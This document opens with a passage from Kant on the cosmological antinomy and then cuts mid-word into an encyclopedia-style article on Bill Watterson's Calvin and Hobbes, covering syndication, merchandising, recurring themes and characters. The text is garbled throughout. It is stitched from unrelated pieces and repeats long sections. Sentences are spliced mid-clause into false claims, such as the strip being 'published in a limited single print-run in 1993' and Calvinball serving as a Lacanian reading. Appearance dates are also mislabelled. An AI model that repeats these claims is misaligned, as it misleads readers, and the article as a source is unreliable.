These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding. We have thus been maintaining that the fault lies with the idea, in being too large or too small for any concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has a beginning [in time] and any limit to its extension in space; whether there is anywhere, and perhaps in my thinking self, an indivisible and indestructible unity, or nothing but what is divisible and transitory; whether I am free in my actions or, like other beings, am led by the hand of nature and of fate; whether finally there is a supreme cause of the world, or whether the things of nature and their order must as the ultimate object terminate thought — an object that even in our speculations can never be transcended: these are questio                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               ute, bland, and unoriginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, and has expressed admiration for the art form In a 1989 interview in The Comics Journal, Watterson states:

    If you look at the old cartoons by Tex Avery and Chuck Jones, you'll see that there are a lot of things single drawings just can't do Animators can get away with incredible distortion and exaggeration    because the animator can control the length of time you see something The bizarre exaggeration barely has time to register, and the viewer doesn’t ponder the incredible license he's witnessed In a comic strip, you just show the highlights of action—you can't show the buildup and release    or at least not without slowing down the pace of everything to the point where it's like looking at individual frames of a movie, in which case you've probably lost the effect you were trying to achieve In a comic strip, you can suggest motion and time, but it's very crude compared to what an animator can do I have a real awe for good animation

After this he was asked if it was "a little scary to think of hearing Calvin's voice" He responded that it was "very scary," and that although he loved the visual possibilities of animation, the thought of casting voice actors to play his characters was uncomfortable He was also unsure whether he wanted to work with an animation team, as he had done all previous work by himself Ultimately, Calvin and Hobbes was never made into an animated series Watterson later stated in the "Calvin and Hobbes Tenth Anniversary Book, the books are "obviously none of these things"

Remaining books do contain some additional content; for instance, The Calvin and Hobbes Lazy Sunday Book contains a long watercolor Spaceman Spiff epic not seen elsewhere until Complete, and The Calvin and Hobbes Tenth Anniversary Book" that he liked the fact that his strip was a "low-tech, one-man operation," and took great pride in the fact that he drew every line and wrote every word on his own

Except for the books, two 16-month calendars 1988–1989 and 1989–1990, the textbook Teaching with Calvin and Hobbes,

 Style and influences

Calvin and Hobbes strips are characterized by sparse but careful craftsmanship, intelligent humor, poignant observations, witty social and political commentary, and well-developed characters Precedents to Calvin's fantasy world can be found in Crockett Johnson's Barnaby, Charles M Schulz's Peanuts, Percy Crosby's Skippy, Berkeley Breathed's Bloom County, and George Herriman's Krazy Kat, while Watterson's use of comics as sociopolitical commentary reaches back to Walt Kelly's Pogo and Quino's Mafalda Schulz and Kelly, in particular, influenced Watterson's outlook on comics during his formative years

In initial strips, the drawings have a more cartoony, flat, crude, Peanuts-like look; in the recent strips, the drawings are three-dimensional Notable elements of Watterson's artistic style are his characters' diverse and often exaggerated expressions particularly those of Calvin, elaborate and bizarre backgrounds for Calvin's flights of imagination, well-captured kinetics, and frequent visual jokes and metaphors In the later years of the strip, with more space available for his use, Watterson experimented more freely with different panel layouts, art styles, stories without dialogue, and greater use of whitespace He also made a point of not showing certain things explicitly: the "Noodle Incident" and the children's book Hamster Huey and the Gooey Kablooie are mentioned several times in passing, but Watterson left the details to the reader's imagination "where 

More details are given regarding Hamster Huey and the Gooey Kablooie: it is a fictional children's book written by Mabel Syrup, it has a sequel titled Commander Coriander Salamander and 'er Singlehander Bellylander, and it is best performed with squeaky voices, gooshy sound effects, and the "Happy Hamster Hop" In its first appearance, Calvin's dad recommended it to Calvin although Calvin was reluctant due to the fact there was not an animated adaptation of it, but nearly all subsequent references to the book show Calvin's dad's frustration at having to read the story to Calvin every evening

There are eighteen Calvin and Hobbes books, published from 1987 to 2005 These include eleven collections, which form a complete archive of the newspaper strips, except for a single daily strip from November 28, 1985 the collections do contain a strip for this date, but it is not the same strip that appeared in some newspapers The alternate strip, a joke about Hobbes taking a bath in the washing machine, has circulated around the Internet  Treasuries usually combine the two preceding collections albeit leaving out some strips with bonus material and include color reprints of Sunday comics

Watterson included a unique Easter egg in The Essential Calvin and Hobbes The back cover is a scene of a giant Calvin rampaging through a town The scene is in fact a faithful reproduction of the town square actually a triangle in Watterson's home town of Chagrin Falls, Ohio Calvin and Hobbes appear in most of the strips, while a small number focus on other supporting characters The broad themes of the strip deal with Calvin's flights of fantasy, his friendship with Hobbes, his misadventures, his unique views on a diverse range of political and cultural issues and his relationships and interactions with his parents, classmates, educators, and other members of society The dual nature of Hobbes is also a recurring motif; Calvin sees Hobbes as a live tiger, while other characters see him as a stuffed animal

Even though the series does not mention specific political figures or current events like political strips such as Garry Trudeau's Doonesbury, it does examine broad issues like environmentalism, public education, and the flaws of opinion polls

Because of Watterson's strong anti-merchandising stance

History

Calvin and Hobbes was conceived when Watterson, having worked in an advertising job he detested,

The first strip was published on November 18, 1985 and the series quickly became a hit Within a year of syndication, the strip was published in roughly 250 newspapers By April 1, 1987, only sixteen months after the strip began, Watterson and his work were featured in an article by the Los Angeles Times

Before long, the strip was in wide circulation outside the United States

Watterson took two extended breaks from writing new strips: from May 1991 to February 1992, and from April through December 1994

In 1995, Watterson sent a letter via his syndicate to all editors whose newspapers carried his strip It contained the following:

    I will be stopping Calvin and Hobbes at the end of the year This was not a recent or an easy decision, and I leave with some sadness My interests have shifted however, and I believe I've done what I can do within the constraints of daily deadlines and small panels I am eager to work at a more thoughtful pace, with fewer artistic compromises I have not yet decided on future projects, but my relationship with Universal Press Syndicate will continue That so many newspapers would carry Calvin and Hobbes is an honor I'll long be proud of, and I've greatly appreciated your support and indulgence over the last decade Drawing this comic strip has been a privilege and a pleasure, and I thank you for giving me the opportunity

The 3,160th and final strip ran on Sunday, December 31, 1995

 Syndication and Watterson's artistic standards

From the outset, Watterson found himself at odds with the syndicate, which urged him to begin merchandising the characters and touring the country to promote the first collections of comic strips Watterson refused To him, the integrity of the strip and its artist would be undermined by commercialization, which he saw as a major negative influence in the world of cartoon art

Watterson also grew increasingly frustrated by the gradual shrinking of available space for comics in the newspapers He lamented that without space for anything more than simple dialogue or spare artwork, comics as an art form were becoming dilute, bland, and unoriginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, and has expressed admiration for the art form In a 1989 interview in The Comics Journal, Watterson states:

    If you look at the old cartoons by Tex Avery and Chuck Jones, you'll see that there are a lot of things single drawings just can't do Animators can get away with incredible distortion and exaggeration    because the animator can control the length of time you see something The bizarre exaggeration barely has time to register, and the viewer doesn’t ponder the incredible license he's witnessed In a comic strip, you can suggest motion and time, but it's very crude compared to what an animator can do I have a real awe for good animation

After this he was asked if it was "a little scary to think of hearing Calvin's voice" He responded that it was "very scary," and that although he loved the visual possibilities of animation, the thought of casting voice actors to play his characters was uncomfortable He was also unsure whether he wanted to work with an animation team, as he had done all previous work by himself Ultimately, Calvin and Hobbes was published in a limited single print-run in 1993 The book includes various Calvin and Hobbes strips together with lessons and questions to follow, such as, "What do you think the principal meant when he said they had quite a file on Calvin" 108 The book is very rare and increasingly sought by collectors antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that this is a parody of art's "pretentious blowhards"

Calvin is confronted every year with Christmas, as his mischievous nature conflicts with his greed for presents from Santa Claus which requires that he behave Calvin frets continually during the Christmas season, sometimes devising strategy by which to fool Santa Claus into giving him gifts Calvin's list of desired "loot," as he terms Christmas presents, is implied to include "incendiary weapons", of which some examples are given atom bombs, torpedoes, a heat-seeking guided missile, grenade launcher, etc in dialogue Most Christmas sequences of strips depict Calvin's parents playing the role of Santa Claus by secretly placing presents beneath the Christmas Tree or in Calvin's stocking; however, one later Sunday strip depicted Santa Claus discussing Calvin's list and history with one of his assistants, although the "reality" of this is left undefined Occasionally, a Christmas strip depicts some kindness shown by Calvin to Hobbes, as if to comment on the morals perceived as being part of the Christmas holiday One Sunday strip appeared as a poem entitled "Christmas Eve", featuring a described scene of Calvin sleeping beside Hobbes between the Christmas Tree and a fire

GROSS is Calvin's secret club, whose sole purpose is to exclude girls generally, and Susie Derkins specifically The name is an acronym that stands for Get Rid Of Slimy girlS Calvin admits "slimy girls" is a bit redundant, as all girls are slimy, "but otherwise it doesn't spell anything" GROSS is headquartered in a tree house Hobbes can climb up to the tree house, but Calvin requires a rope Hobbes refuses to drop down the rope until Calvin has said the password, which is an ode to tigers that is over eight verses long and occasionally accompanied by a dance Calvin and Hobbes are its only members, and each takes up multiple official titles while wearing newspaper chapeaux during meetings Most commonly, Calvin's title is Dictator-For-Life, and Hobbes is President and First Tiger The club has an anthem, but most of its words are unknown to outsiders Calvin often awards badges, promotions, etc, such as "Bottle Caps of Valor" Many GROSS plans to annoy or otherwise attack Susie end in failure, while many meetings end in a Calvinball-style battle of rule changes or promotion granting, before degenerating into a brawl

Both the Noodle Incident and the book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that he adapted this jargon and similar examples from several other strips from an actual book of art criticism

Overall, Watterson's satirical essays serve to attack both sides, criticizing both the commercial mainstream and the artists who are supposed to be "outside" it Not long after he began drawing his "Dinosaurs In Rocket Ships" series, Calvin tells Hobbes:

    The hard part for us avant-garde post-modern artists is deciding whether or not to embrace commercialism Do we allow our work to be hyped and exploited by a market that's simply hungry for the next new thing Do we participate in a system that turns high art into low art so it's better suited for mass consumption Of course, when an artist goes commercial, he makes a mockery of his status as an outsider and free thinker He buys into the crass and shallow values art should transcend He trades the integrity of his art for riches and fame Oh, what the heck I'll do it

 Social criticisms

In addition to his criticisms of art and academia, Watterson often used the strip to comment on American culture and society With rare exception, the strip avoids reference to actual people or events Watterson's commentary is therefore necessarily generalized He expresses frustration with public decadence and apathy, with commercialism, and with the pandering nature of the mass media Calvin is often seen "glued" to the television, while his father speaks with the voice of ascetic virtue, struggling to impart his values to Calvin

Watterson's vehicle for criticism is often Hobbes, who comments on Calvin's unwholesome habits from a more cynical perspective He is more likely to make a wry observation than actually intervene; he may merely watch as Calvin inadvertently makes the point himself In one instance, Calvin tells Hobbes about a science fiction story he has read in which machines turn humans into zombie slaves Hobbes makes a comment about the irony of machines controlling people instead of the other way around; Calvin then exclaims, "I'll say Hey! What time is it My TV show is on!" and sprints back inside to watch it

A Sunday, 21 June 1992 strip discussing the Big Bang coined the term "Horrendous Space Kablooie" for the event, a term which has achieved some tongue-in-cheek popularity among the scientific community, particularly in informal discussion and often shortened to "the HSK"

 Visual distortions

On several occasions, Watterson drew strips with strange visual distortions: inverted colors, objects turning "neo-cubist", or fantasy environments with other unusual physical phenomena Only Calvin is able to perceive these alterations, which seem to illustrate both his own shifting point of view and a typical six-year-old's wild imagination

In the Tenth Anniversary Book, Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes in the context of other literature featuring living toys She argues that these toys are examples of transitional objects that mediate childhood experience and the adult world, where Hobbes serves both as a figure of Calvin's childish fantasy life and as an outlet for the expression of libidinous desires more associated with adults She cites, for example, a strip where Hobbes expresses a desire that is more sophisticated and adult than Calvin's frame of reference usually allows Kuznets also looks at Calvin's other fantasies, suggesting that they are a second tier of fantasies utilized in places like school where transitional objects such as Hobbes would not be socially acceptable

A second line of argument comes from Philip Sandifer, who uses Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

Hobbes

From everyone else's point of view, Hobbes is Calvin's stuffed tiger From Calvin's point of view, however, Hobbes is an anthropomorphic tiger, much larger than Calvin and full of independent attitudes and ideas But when the perspective shifts to any other character, readers again see merely a stuffed animal, usually seated at an off-kilter angle This is, of course, an odd dichotomy, and Watterson explains it thus:

    When Hobbes is a stuffed toy in one panel and alive in the next, I'm juxtaposing the "grown-up" version of reality with Calvin's version, and inviting the reader to decide which is truer

Hobbes' true nature is made more ambiguous by episodes that seem to attribute real-life consequences to Hobbes's actions One example is his habit of pouncing on Calvin the moment he arrives home from school, an act which always leaves Calvin with bruises and scrapes that are evident to other characters In another incident, Hobbes manages to tie Calvin to a chair in such a way that Calvin's father is unable to understand how he could have done it himself Yet another incident features Hobbes leaving Calvin hanging by the seat of his pants from a tree branch above Calvin's head

Hobbes is named after the 17th-century philosopher Thomas Hobbes, who had what Watterson described as "a dim view of human nature"

Although the first strips clearly show Calvin capturing Hobbes by means of a snare with tuna fish sandwich as the bait, a later comic August 1, 1989 seems to imply that Hobbes is, in fact, older than Calvin, and has been around his whole life Watterson eventually decided that it was not important to establish how Calvin and Hobbes had first met

 Supporting characters

    Main article: Secondary characters in Calvin and Hobbes

 Calvin's family
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other

Dad's first appearance: November 26, 1985 Mom's last appearance: December 3, 1995

Mom's first appearance: November 26, 1985 Mom's last appearance: December 21, 1995

Calvin's mother and father are for the most part typical Middle American middle-class parents Like many other characters in the strip, their relatively down-to-earth and sensible attitudes serve primarily as a foil for Calvin's outlandish behavior At the beginning of the strip, Watterson says some fans were angered by the way Calvin's parents thought of Calvin his father has remarked that he would have preferred a dog instead They are not above the occasional cruelty: his mother provided him with a cigarette to teach him a lesson, and his father often tells him outrageous lies when asked a straight question Calvin's father is a patent attorney; his mother is a stay-at-home mom Both parents go through the entire strip unnamed, except as "Mom" and "Dad," or such nicknames as "hon" and "dear" when referring to each other Watterson has never given Calvin's parents names "because as far as the strip is concerned, they are important only as Calvin's mom and dad" This ended up being somewhat problematic when Calvin's Uncle Max was in the strip for a week and could not refer to the parents by name It was one of the main reasons that Max never reappeared


First appearance: December 5, 1985 Last appearance: December 16, 1995

